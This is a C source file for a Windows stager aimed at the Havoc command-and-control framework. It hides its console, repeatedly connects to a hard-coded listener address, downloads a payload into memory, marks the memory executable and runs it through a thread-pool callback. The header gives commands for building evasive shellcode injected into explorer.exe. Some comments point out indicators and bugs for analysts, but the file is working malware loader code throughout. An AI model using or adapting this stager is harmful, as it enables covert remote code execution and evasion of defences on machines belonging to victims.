/* | |
** p4p1: http://p4p1.github.io/ | |
** Created on: Wed 02 Aug 2023 01:37:50 PM CEST | |
** stager.c | |
** Description: | |
** A C stager for havoc. | |
** Commands for things: | |
** ./Shhhloader.py -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin | |
** ./Shhhloader.py -v -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin | |
** x86_64-w64-mingw32-gcc net_stager.c -o hidden2.exe -lws2_32 | |
*/ | |
#include <ws2tcpip.h>
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <stdio.h>   /* duplicate of the include above; harmless because of the header's guard */
#pragma comment(lib,"ws2_32.lib")
/* Listener endpoint. Both values are fixed at compile time, so the address and
** port below are the sample's only network indicators. PORT is in host order;
** htons() is applied in retrieve_stager(). */
#define IP_ADDR "192.168.1.104"
#define PORT 1234
/* Expected payload length in bytes. It sizes the global buffer and bounds the
** single recv() in retrieve_stager(). Presumably the size of the demon.x64.bin
** named in the file header — nothing here verifies that the bytes received
** match this length. The macro name keeps "x64" even on the _32_BIT_ branch. */
#ifdef _32_BIT_
#define demon_x64_bin_len 89088
#else
#define demon_x64_bin_len 97279
#endif
/* Receive buffer for the downloaded payload. Static storage, so it is
** zero-filled until recv() writes into it; filled by retrieve_stager() and
** copied into executable memory by main(). */
unsigned char data[demon_x64_bin_len];
/* Download the payload from IP_ADDR:PORT into the global `data` buffer.
**
** Returns 1 once a recv() call has completed without SOCKET_ERROR, and 2 on
** any failure (WSAStartup, socket(), connect(), recv()). main() loops while
** the result is 2, so every failure path here is re-run immediately.
**
** Observable behaviour for analysts: one plain TCP connect to a fixed address
** and port, repeated without back-off on failure, followed by a single bulk
** read of up to demon_x64_bin_len bytes. */
int retrieve_stager()
{
    WSADATA wsa;
    SOCKET s;
    struct sockaddr_in cleanServer;   // not zero-initialised; only family, port and address are set below
    int response_size = 0;            // byte count returned by recv(); assigned but never read afterwards
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
        return 2;
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
        return 2;
    InetPtonA(AF_INET, IP_ADDR, &cleanServer.sin_addr.s_addr);   // return value is not checked
    cleanServer.sin_family = AF_INET;
    cleanServer.sin_port = htons(PORT);
    // The two early returns below leave `s` open (no closesocket()), so each
    // failed attempt in main()'s retry loop leaks one socket handle.
    if (connect(s, (struct sockaddr*)&cleanServer, sizeof(cleanServer)) < 0)
        return 2;
    // Single recv() bounded by the expected payload length. response_size is
    // never compared against demon_x64_bin_len, so a short read is treated the
    // same as a complete one and the rest of `data` keeps its prior contents.
    if ((response_size = recv(s, (char*)data, demon_x64_bin_len, 0)) == SOCKET_ERROR)
        return 2;
    closesocket(s);
    return 1;
}
/* Entry point: hide the console window, fetch the payload, then execute it.
**
** Flow: AllocConsole() + ShowWindow(SW_HIDE) on the new console; loop on
** retrieve_stager() until it returns something other than 2; allocate a
** PAGE_EXECUTE_READWRITE region, copy `data` into it, and register that address
** as a thread-pool wait callback on an event that is created already signalled.
**
** Indicators visible from this code: a process that creates and immediately
** hides a console window, a private RWX allocation the size of the payload,
** and a CreateThreadpoolWait callback whose address lies inside that
** allocation. None of the Win32 return values here are checked. */
int main(void)
{
    PVOID alloc;            // unused
    DWORD oldProtect = 0;   // unused
    HANDLE cr;              // unused
    HANDLE hProcess;        // unused
    int ret_val = 2;        // 2 is retrieve_stager()'s failure code, so the loop below runs at least once
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass", NULL);   // handle of the console just created; NULL is not checked
    ShowWindow(stealth, 0);                             // 0 == SW_HIDE
    while (ret_val == 2) // constantly download stager on error;
        ret_val = retrieve_stager();
    // Auto-reset event (bManualReset = FALSE), created signalled (bInitialState = TRUE).
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    // Executable + writable private allocation sized to the whole buffer; a NULL
    // result would be passed straight to RtlMoveMemory.
    LPVOID scodeAddress = VirtualAlloc(NULL, sizeof(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(scodeAddress, data, sizeof(data));
    // The copied bytes are registered as the wait callback and run on a
    // thread-pool thread once the wait on `event` is satisfied.
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)scodeAddress, NULL, NULL);
    SetThreadpoolWait(threadPoolWait, event, NULL);
    // NOTE(review): `event` is auto-reset, so this wait and the thread-pool wait
    // compete for its single signalled state; which one consumes it is not fixed
    // by this code.
    WaitForSingleObject(event, INFINITE);
    return 0;
}